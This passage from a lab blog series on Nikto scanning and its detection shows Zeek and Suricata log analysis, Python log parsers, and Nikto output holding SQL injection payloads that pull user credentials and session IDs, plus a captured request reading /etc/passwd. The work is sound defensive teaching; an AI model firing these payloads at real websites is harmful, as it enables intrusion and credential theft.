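            if fields is None or len(values) != len(fields):
                raise ValueError("malformed Zeek record: %r" % line)
            records.append(dict(zip(fields, values)))
    return records


def flag_script_uploads(http_text, files_text):
    """Return one finding per POST whose uploaded content looks like script source."""
    files_by_uid = defaultdict(list)
    for f in parse_zeek(files_text):
        files_by_uid[f["uid"]].append(f)
    findings = []
    for h in parse_zeek(http_text):
        if h["method"] != "POST":
            continue
        mimes = set(h["orig_mime_types"].split(",")) - {"-"}
        names = [n for n in h["orig_filenames"].split(",") if n != "-"]
        by_ext = any(n.lower().endswith(SCRIPT_EXTS) for n in names)
        if not (mimes & SCRIPT_MIMES or by_ext):
            continue
        # Join on the connection UID; keep client->server files (is_orig == T)
        # and drop the zero-byte multipart fields, as the post's grep does.
        uploaded = [f for f in files_by_uid[h["uid"]]
                    if f["is_orig"] == "T" and int(f["seen_bytes"]) > 0]
        findings.append({
            "uid": h["uid"],
            "client": "%s:%s" % (h["id.orig_h"], h["id.orig_p"]),
            "uri": h["uri"],
            "filenames": names,
            "mime_types": sorted(mimes),
            "fuids": [f["fuid"] for f in uploaded],
            "uploaded_bytes": sum(int(f["seen_bytes"]) for f in uploaded),
        })
    return findings


if __name__ == "__main__":
    for finding in flag_script_uploads(HTTP_LOG, FILES_LOG):
        print(finding)
```

On real logs, read the two files and pass their text in; the <i>fuids</i> in each finding are what you hand to Zeek's file extraction or to the TShark export step above to pull the uploaded content.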
</div><div><br /></div><div><div>Obviously, there are entries in the <i>conn.log</i> file. However, the objective is to keep things simple for this analysis.</div><div><br /></div><div>Moving on to the IDS/IPS.</div></div><div><br /></div><div><b><span style="font-size: medium;">Detect - Suricata (IDS) Analysis</span></b></div><div><br /></div><div>Set up Suricata to operate in IDS mode</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[/var/log/suricata]</span>
<span style="color: white;">└─$ sudo suricata -c /etc/suricata/suricata.yaml -s /var/lib/suricata/rules/suricata.rules -i eth0 -l /var/log/suricata/ --simulate-ips -k all</span>
</pre></div>
</div><div><br /></div><div>How many alerts were triggered for this activity?</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[/var/log/suricata]</span>
<span style="color: white;">└─$ cat fast.log | grep --perl-regexp '\[\*\*\].*?\[\**\]' --only-matching | wc --lines</span>
<span style="color: white;">1 </span>
</pre></div>
</div><div><br /></div><div>Hmmm! One alert! Interesting!!</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[/var/log/suricata]</span>
<span style="color: white;">└─$ cat fast.log </span>
<span style="color: white;">06/22/2023-15:27:00.720561 [**] [1:2011768:8] ET WEB_SERVER PHP tags in HTTP POST [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 10.0.0.108:47986 -> 10.0.0.106:80</span>
</pre></div>
</div><div><br /></div><div>Looking at the <i>alert-debug.log</i> file</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[/var/log/suricata]</span>
<span style="color: white;">└─$ cat alert-debug.log | more </span>
<span style="color: white;">+================</span>
<span style="color: white;">TIME: 06/22/2023-15:27:00.720561</span>
<span style="color: white;">PKT SRC: wire/pcap</span>
<span style="color: white;">SRC IP: 10.0.0.108</span>
<span style="color: white;">DST IP: 10.0.0.106</span>
<span style="color: white;">PROTO: 6</span>
<span style="color: white;">SRC PORT: 47986</span>
<span style="color: white;">DST PORT: 80</span>
<span style="color: white;">TCP SEQ: 2986100032</span>
<span style="color: white;">TCP ACK: 2432827111</span>
<span style="color: white;">FLOW: to_server: TRUE, to_client: FALSE</span>
<span style="color: white;">FLOW Start TS: 06/22/2023-15:27:00.719233</span>
<span style="color: white;">FLOW PKTS TODST: 3</span>
<span style="color: white;">FLOW PKTS TOSRC: 1</span>
<span style="color: white;">FLOW Total Bytes: 1708</span>
<span style="color: white;">FLOW IPONLY SET: TOSERVER: TRUE, TOCLIENT: TRUE</span>
<span style="color: white;">FLOW ACTION: DROP: FALSE</span>
<span style="color: white;">FLOW NOINSPECTION: PACKET: FALSE, PAYLOAD: FALSE, APP_LAYER: FALSE</span>
<span style="color: white;">FLOW APP_LAYER: DETECTED: TRUE, PROTO 1</span>
<span style="color: white;">PACKET LEN: 1514</span>
<span style="color: white;">PACKET:</span>
<span style="color: white;">...</span>
</pre></div>
</div><div><br /></div><div><div>We can see that this ties in with the other network-based evidence above, especially when we focus on the client's source port, TCP 47986.</div><div><br /></div><div>Peeking a bit more into this PHP traffic.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[/var/log/suricata]</span>
<span style="color: white;">└─$ cat alert-debug.log | grep ".php"</span>
<span style="color: white;"> 03C0 63 61 74 69 6F 6E 2F 78 2D 70 68 70 0D 0A 0D 0A cation/x -php....</span>
<span style="color: white;"> 03D0 2F 2A 3C 3F 70 68 70 20 2F 2A 2A 2F 20 65 72 72 /*&lt;?php /**/ err</span>
<span style="color: white;"> 0370 2E 70 68 70 22 0D 0A 43 6F 6E 74 65 6E 74 2D 54 .php"..C ontent-T</span>
<span style="color: white;"> 0390 2F 78 2D 70 68 70 0D 0A 0D 0A 2F 2A 3C 3F 70 68 /x-php.. ../*&lt;?ph</span>
<span style="color: white;"> 0370 2E 70 68 70 22 0D 0A 43 6F 6E 74 65 6E 74 2D 54 .php"..C ontent-T</span>
<span style="color: white;"> 0390 2F 78 2D 70 68 70 0D 0A 0D 0A 2F 2A 3C 3F 70 68 /x-php.. ../*&lt;?ph</span>
</pre></div>
</div><div><br /></div><div>Well I'm going to close off for now.</div><div><br /></div><div><b>Hope you enjoyed the posts in this series:</b></div><div><div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-scanning-for.html" target="_blank">Beginning Nikto - Scanning for interesting files seen in the logs</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-misconfiguration.html" target="_blank">Beginning Nikto - Misconfiguration / Default File - with evasion type 1 -> Random URI encoding (non-UTF8)</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Information Disclosure with evasion type 2 -> Directory self-reference (/./)</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Injection (XSS/Script/HTML) - with evasion type 3 -> Premature URL ending</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Remote File Retrieval with evasion type 4 -> Prepend long random string</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Command Execution / Remote Shell</a> </div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-sql-injection-with.html" target="_blank">Beginning Nikto - SQL Injection with default evasion</a> </div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-sql-injection-with.html" target="_blank">Beginning Nikto - File Upload Vulnerability testing</a></div></div><div><br /></div><div><br /><b>References:</b></div><div><a 
href="https://dtwh.medium.com/damn-vulnerable-web-application-dvwa-file-upload-walkthrough-bbb9743080cc">https://dtwh.medium.com/damn-vulnerable-web-application-dvwa-file-upload-walkthrough-bbb9743080cc</a></div><div><a href="https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/php/meterpreter/reverse_tcp.md">https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/php/meterpreter/reverse_tcp.md</a></div><div><a href="https://www.hackingarticles.in/hack-file-upload-vulnerability-dvwa-bypass-security/">https://www.hackingarticles.in/hack-file-upload-vulnerability-dvwa-bypass-security/</a></div><div><a href="https://docs.rapid7.com/metasploit/resource-scripts/">https://docs.rapid7.com/metasploit/resource-scripts/</a></div><div><a href="https://portswigger.net/web-security/file-upload">https://portswigger.net/web-security/file-upload</a></div></div><div><br /></div><div>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PEN</div><div><br /></div><div><b><span style="font-size: medium;">Beginning Nikto - SQL Injection with default evasion</span></b> (2023-12-12)</div><p>This post is part of the series of learning more about Nikto and web application scanning from the perspectives of both the <a href="https://www.amazon.com/Learning-Practicing-Leveraging-Practical-Detection/dp/1731254458" target="_blank">hack and its detection</a>. </p><p>From the hacking perspective, Nikto is the tool used. From the detection perspective, the tools and processes used for the network forensics are log analysis, TShark, Zeek and Suricata.<br /><br /></p><p><b><span style="font-size: medium;">The Hack - SQL Injection with default evasion.</span></b></p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_9]</span>
<span style="color: white;">└─$ nikto -host http://10.0.0.106 -ipv4 -Display 1 --ask no -nossl -no404 -Tuning 9</span>
<span style="color: white;">- Nikto v2.5.0</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">+ Target IP: 10.0.0.106</span>
<span style="color: white;">+ Target Hostname: 10.0.0.106</span>
<span style="color: white;">+ Target Port: 80</span>
<span style="color: white;">+ Start Time: 2023-06-09 14:09:20 (GMT-4)</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">+ Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28</span>
<span style="color: white;">+ /cgi.cgi/: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options</span>
<span style="color: white;">+ /cgi.cgi/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/</span>
<span style="color: white;">+ /: Retrieved x-powered-by header: PHP/8.0.28.</span>
<span style="color: white;">+ PHP/8.0.28 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.</span>
<span style="color: white;">+ OpenSSL/1.1.1t appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 11 2023.</span>
<span style="color: white;">+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing</span>
<span style="color: white;">+ /index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/* - Redirects (302) to http://10.0.0.106/dashboard/ , My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.</span>
<span style="color: white;">....</span>
<span style="color: white;">/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select%201%20FROM(select%20count(*),concat((select%20(select%20concat(session_id))%20FROM%20jml_session%20LIMIT%200,1),floor(rand(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a) - Redirects (302) to http://10.0.0.106/dashboard/ , Joomla is vulnerable to a SQL injection which can lead to administrator access. https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/?page=1&year=0&month=0</span>
<span style="color: white;">+ 783 requests: 0 error(s) and 6 item(s) reported on remote host</span>
<span style="color: white;">+ End Time: 2023-06-09 14:09:22 (GMT-4) (2 seconds)</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">+ 1 host(s) tested</span>
</pre></div>
<br /><div>Once again, <i>index.php</i> does not have most of the parameters that Nikto is reporting as vulnerable. What do I make of the output from the tool? I make that it is time for me to move on.</div><div><br /></div><div>See here for more guidance on SQL Injection:</div><a href="https://www.securitynik.com/2017/02/beginning-web-application-testing-sql.html">Learning by practicing: Beginning Web Application Testing: SQL Injection - Mutillidae (securitynik.com)</a><br /><a href="https://www.securitynik.com/2020/07/continuing-sql-injection-with-sqlmap.html">Learning by practicing: Continuing SQL Injection with SQLMap - Exploitation (securitynik.com)</a><br /><br /><br /><div><b><span style="font-size: medium;">Detect - Log Analysis</span></b></div><div><br /></div><div><div>Quick log analysis says most of this activity is a waste of time. First, most of the parameters targeted here do not exist on the <i>index.php</i> page. We know this from the previous posts in this series. Second, there is no <i>request.php</i> file.</div><div><br /></div><div>I've lost interest. Maybe I need to do the test from another perspective.<br /><br />See this link for assistance with detecting SQL injection in your infrastructure.</div><div><a href="https://www.securitynik.com/2017/02/beginning-web-application-testing_15.html">Learning by practicing: Beginning Web Application Testing: Detecting SQL Injection - Mutillidae (securitynik.com)</a></div><div><br /></div><div><br /></div></div><div><span style="font-size: medium;"><b>Detect - Suricata (IDS) Analysis</b></span></div><div><div><br /></div></div><div><div>Set up Suricata to operate in IDS mode</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[/var/log/suricata]</span>
<span style="color: white;">└─$ sudo suricata -c /etc/suricata/suricata.yaml -s /var/lib/suricata/rules/suricata.rules -i eth0 -l /var/log/suricata/ --simulate-ips -k all</span>
</pre></div>
</div><div><br /></div><div><div>What does the IDS see?</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_9]</span>
<span style="color: white;">└─$ cat fast.log | cut --fields=3 --delimiter='[' | sort | uniq --count | sort --numeric-sort --reverse | head --lines=5</span>
<span style="color: white;"> 35 1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt </span>
<span style="color: white;"> 14 1:2021390:3] ET WEB_SPECIFIC_APPS WEB-PHP RCE PHPBB 2004-1315 </span>
<span style="color: white;"> 6 1:2006445:14] ET WEB_SERVER Possible SQL Injection Attempt SELECT FROM </span>
<span style="color: white;"> 5 1:2006446:14] ET WEB_SERVER Possible SQL Injection Attempt UNION SELECT </span>
<span style="color: white;"> 4 1:2011042:6] ET WEB_SERVER MYSQL SELECT CONCAT SQL Injection Attempt </span>
</pre></div>
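<div><br /></div><div>The alert counting and per-signature ranking done above with grep, cut, sort and uniq (and the one-line alert count in the file-upload post's Suricata section), as an added example that is not part of the original post: a Python parser for Suricata's <i>fast.log</i> line format that turns each alert into a record, ranks signatures by count, and lists the distinct SQL injection signatures. The sample alerts are constructed: the first is the PHP-tags alert quoted in the previous post, the rest reuse the ET signature IDs and messages listed above with made-up timestamps and ports, plus a hypothetical local rule with no classtype.</div>

```python
"""Parse Suricata fast.log into alert records and summarise them by signature:
the structured version of the grep/cut/sort/uniq pipelines in the post.

Sample alerts are constructed: the first is the line quoted in the post, the
rest reuse the ET signature IDs and messages listed in the post with made-up
timestamps and source ports, plus one hypothetical local rule with no classtype.
"""
import re
from collections import Counter

# fast.log layout:  <ts>  [**] [gid:sid:rev] <msg> [**] [Classification: <c>]
#                   [Priority: <n>] {<proto>} <src ip:port> -> <dst ip:port>
# The Classification block is omitted for rules that set no classtype.
FAST_RE = re.compile(
    r"^(?P<ts>\S+)\s+\[\*\*\]\s+\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+"
    r"(?P<msg>.*?)\s+\[\*\*\]\s+"
    r"(?:\[Classification:\s+(?P<classification>[^\]]*)\]\s+)?"
    r"\[Priority:\s+(?P<priority>\d+)\]\s+\{(?P<proto>[^}]+)\}\s+"
    r"(?P<src>\S+)\s+->\s+(?P<dst>\S+)\s*$"
)

SAMPLE_FAST_LOG = """\
06/22/2023-15:27:00.720561  [**] [1:2011768:8] ET WEB_SERVER PHP tags in HTTP POST [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 10.0.0.108:47986 -> 10.0.0.106:80
06/09/2023-14:09:20.101000  [**] [1:2006445:14] ET WEB_SERVER Possible SQL Injection Attempt SELECT FROM [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 10.0.0.108:40001 -> 10.0.0.106:80
06/09/2023-14:09:20.102000  [**] [1:2006446:14] ET WEB_SERVER Possible SQL Injection Attempt UNION SELECT [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 10.0.0.108:40001 -> 10.0.0.106:80
06/09/2023-14:09:20.250000  [**] [1:2011042:6] ET WEB_SERVER MYSQL SELECT CONCAT SQL Injection Attempt [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 10.0.0.108:40002 -> 10.0.0.106:80
06/09/2023-14:09:20.251000  [**] [1:2006445:14] ET WEB_SERVER Possible SQL Injection Attempt SELECT FROM [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 10.0.0.108:40002 -> 10.0.0.106:80
06/09/2023-14:09:21.010000  [**] [1:2006445:14] ET WEB_SERVER Possible SQL Injection Attempt SELECT FROM [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 10.0.0.108:40003 -> 10.0.0.106:80
06/09/2023-14:09:21.011000  [**] [1:2006446:14] ET WEB_SERVER Possible SQL Injection Attempt UNION SELECT [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 10.0.0.108:40003 -> 10.0.0.106:80
06/09/2023-14:09:21.500000  [**] [1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 10.0.0.108:40004 -> 10.0.0.106:80
06/09/2023-14:09:22.000000  [**] [1:1000001:1] LOCAL Nikto user agent seen [**] [Priority: 3] {TCP} 10.0.0.108:40005 -> 10.0.0.106:80
"""


def parse_fast_log(text):
    """Return (alerts, unparsed_lines); each alert is a dict with typed fields."""
    alerts, unparsed = [], []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = FAST_RE.match(line)
        if m is None:
            unparsed.append(line)  # never silently drop what the regex misses
            continue
        rec = m.groupdict()
        for key in ("gid", "sid", "rev", "priority"):
            rec[key] = int(rec[key])
        # rpartition keeps IPv6 addresses intact; the port follows the last colon
        rec["src_ip"], _, rec["src_port"] = rec["src"].rpartition(":")
        rec["dst_ip"], _, rec["dst_port"] = rec["dst"].rpartition(":")
        alerts.append(rec)
    return alerts, unparsed


def top_signatures(alerts, n=5):
    """Rank signatures by alert count, like the post's cut | sort | uniq -c."""
    counts = Counter((a["sid"], a["msg"]) for a in alerts)
    ranked = sorted(counts.items(), key=lambda kv: (-kv[1], kv[0][0]))
    return [(count, sid, msg) for (sid, msg), count in ranked[:n]]


def signatures_matching(alerts, pattern):
    """Distinct (sid, msg) pairs whose message matches pattern, case-insensitive."""
    rx = re.compile(pattern, re.IGNORECASE)
    return sorted({(a["sid"], a["msg"]) for a in alerts if rx.search(a["msg"])})


if __name__ == "__main__":
    alerts, bad = parse_fast_log(SAMPLE_FAST_LOG)
    print("%d alerts parsed, %d lines unparsed" % (len(alerts), len(bad)))
    for count, sid, msg in top_signatures(alerts):
        print("%4d  %s  %s" % (count, sid, msg))
    print("SQL injection signatures:", signatures_matching(alerts, r"SQL Injection"))
```

Feed it the contents of <i>/var/log/suricata/fast.log</i> instead of the sample and check the unparsed list first; a non-empty list means the log carries a line shape the regex does not yet cover.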
</div><div><br /></div><div><br /></div><div><div>We see 3 unique alerts for SQL injection attempts. Find the associated rules:</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_9]</span>
<span style="color: white;">└─$ grep --perl-regexp "2006445|2006446|2011042" /var/lib/suricata/rules/suricata.rules </span>
<span style="color: white;">alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Possible SQL Injection Attempt SELECT FROM"; flow:established,to_server; http.uri; content:"SELECT"; nocase; content:"FROM"; nocase; distance:0; reference:url,en.wikipedia.org/wiki/SQL_injection; reference:url,doc.emergingthreats.net/2006445; classtype:web-application-attack; sid:2006445; rev:14; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, signature_severity Major, tag SQL_Injection, updated_at 2020_05_01;)</span>
<span style="color: white;">alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Possible SQL Injection Attempt UNION SELECT"; flow:established,to_server; http.uri; content:"UNION"; nocase; content:"SELECT"; nocase; distance:0; reference:url,en.wikipedia.org/wiki/SQL_injection; reference:url,doc.emergingthreats.net/2006446; classtype:web-application-attack; sid:2006446; rev:14; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, signature_severity Major, tag SQL_Injection, updated_at 2020_09_01;)</span>
<span style="color: white;">alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER MYSQL SELECT CONCAT SQL Injection Attempt"; flow:established,to_server; http.uri; content:"SELECT"; nocase; content:"CONCAT"; nocase; pcre:"/SELECT.+CONCAT/i"; reference:url,ferruh.mavituna.com/sql-injection-cheatsheet-oku/; reference:url,www.webdevelopersnotes.com/tutorials/sql/a_little_more_on_the_mysql_select_statement.php3; reference:url,doc.emergingthreats.net/2011042; classtype:web-application-attack; sid:2011042; rev:6; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, signature_severity Major, tag SQL_Injection, updated_at 2020_09_14;)</span>
</pre></div>
</div><div><br /></div><div>Find an alert for "<i>2006445</i>"</div><div><br /></div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_9]</span>
<span style="color: white;">└─$ less alert-debug.log</span>
<span style="color: white;">ALERT CNT: 2</span>
<span style="color: white;">ALERT MSG [00]: ET WEB_SERVER Possible SQL Injection Attempt SELECT FROM</span>
<span style="color: white;">ALERT GID [00]: 1</span>
<span style="color: white;">ALERT SID [00]: 2006445</span>
<span style="color: white;">ALERT REV [00]: 14</span>
<span style="color: white;">ALERT CLASS [00]: Web Application Attack</span>
<span style="color: white;">ALERT PRIO [00]: 1</span>
<span style="color: white;">ALERT FOUND IN [00]: STATE</span>
<span style="color: white;">ALERT IN TX [00]: 34</span>
<span style="color: white;">PAYLOAD LEN: 316</span>
<span style="color: white;">PAYLOAD:</span>
<span style="color: white;"> 0000 47 45 54 20 2F 73 69 74 65 2F 27 25 32 30 55 4E GET /sit e/'%20UN</span>
<span><span style="color: white;"> 0010 49 4F 4E 25 32 30 41 4C 4C 25 32 30 </span><b><span style="color: #fcff01;">53 45 4C 45</span></b><span style="color: white;"> ION%20AL L%20</span><span style="color: #fcff01;"><b>SELE</b></span></span>
<span><span style="color: white;"> 0020 </span><b><span style="color: #fcff01;">43 54</span></b><span style="color: white;"> 25 32 30 46 69 6C 65 54 6F 43 6C 6F 62 28 </span><b><span style="color: #fcff01;">CT</span></b><span style="color: white;">%20Fil eToClob(</span></span>
<span style="color: white;"> 0030 27 2F 65 74 63 2F 70 61 73 73 77 64 27 2C 27 73 '/etc/pa sswd','s</span>
<span style="color: white;"> 0040 65 72 76 65 72 27 29 3A 3A 68 74 6D 6C 2C 30 25 erver'): :html,0%</span>
<span><span style="color: white;"> 0050 32 30 </span><b><span style="color: #fcff01;">46 52 4F 4D</span></b><span style="color: white;"> 25 32 30 73 79 73 75 73 65 72 20</span><b><span style="color: #fcff01;">FROM</span></b><span style="color: white;">%2 0sysuser</span></span>
<span style="color: white;"> 0060 73 25 32 30 57 48 45 52 45 25 32 30 75 73 65 72 s%20WHER E%20user</span>
<span style="color: white;"> 0070 6E 61 6D 65 3D 55 53 45 52 25 32 30 2D 2D 2F 2E name=USE R%20--/.</span>
<span style="color: white;"> 0080 68 74 6D 6C 20 48 54 54 50 2F 31 2E 31 0D 0A 55 html HTT P/1.1..U</span>
<span style="color: white;"> 0090 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C ser-Agen t: Mozil</span>
<span style="color: white;"> 00A0 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 20 la/5.0 ( Windows </span>
<span style="color: white;"> 00B0 4E 54 20 31 30 2E 30 3B 20 57 69 6E 36 34 3B 20 NT 10.0; Win64; </span>
<span style="color: white;"> 00C0 78 36 34 29 20 41 70 70 6C 65 57 65 62 4B 69 74 x64) App leWebKit</span>
<span style="color: white;"> 00D0 2F 35 33 37 2E 33 36 20 28 4B 48 54 4D 4C 2C 20 /537.36 (KHTML, </span>
<span style="color: white;"> 00E0 6C 69 6B 65 20 47 65 63 6B 6F 29 20 43 68 72 6F like Gec ko) Chro</span>
<span style="color: white;"> 00F0 6D 65 2F 37 34 2E 30 2E 33 37 32 39 2E 31 36 39 me/74.0. 3729.169</span>
<span style="color: white;"> 0100 20 53 61 66 61 72 69 2F 35 33 37 2E 33 36 0D 0A Safari/ 537.36..</span>
<span style="color: white;"> 0110 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 4B 65 65 70 Connecti on: Keep</span>
<span style="color: white;"> 0120 2D 41 6C 69 76 65 0D 0A 48 6F 73 74 3A 20 31 30 -Alive.. Host: 10</span>
<span style="color: white;"> 0130 2E 30 2E 30 2E 31 30 36 0D 0A 0D 0A .0.0.106 ....</span>
</pre></div>
</div><div><br /></div><div>That's it. Moving on.<br /><p></p></div><div><div><b>Hope you enjoyed the posts in this series:</b></div><div><div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-scanning-for.html" target="_blank">Beginning Nikto - Scanning for interesting files seen in the logs</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-misconfiguration.html" target="_blank">Beginning Nikto - Misconfiguration / Default File - with evasion type 1 -> Random URI encoding (non-UTF8)</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Information Disclosure with evasion type 2 -> Directory self-reference (/./)</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Injection (XSS/Script/HTML) - with evasion type 3 -> Premature URL ending</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Remote File Retrieval with evasion type 4 -> Prepend long random string</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Command Execution / Remote Shell</a> </div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-sql-injection-with.html" target="_blank">Beginning Nikto - SQL Injection with default evasion</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-sql-injection-with.html" target="_blank">Beginning Nikto - File Upload Vulnerability testing</a></div></div></div></div>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com0tag:blogger.com,1999:blog-7303400454979750101.post-77132757627439399722023-12-12T18:28:00.000-08:002023-12-12T18:36:49.772-08:00Beginning Nikto - Command Execution / 
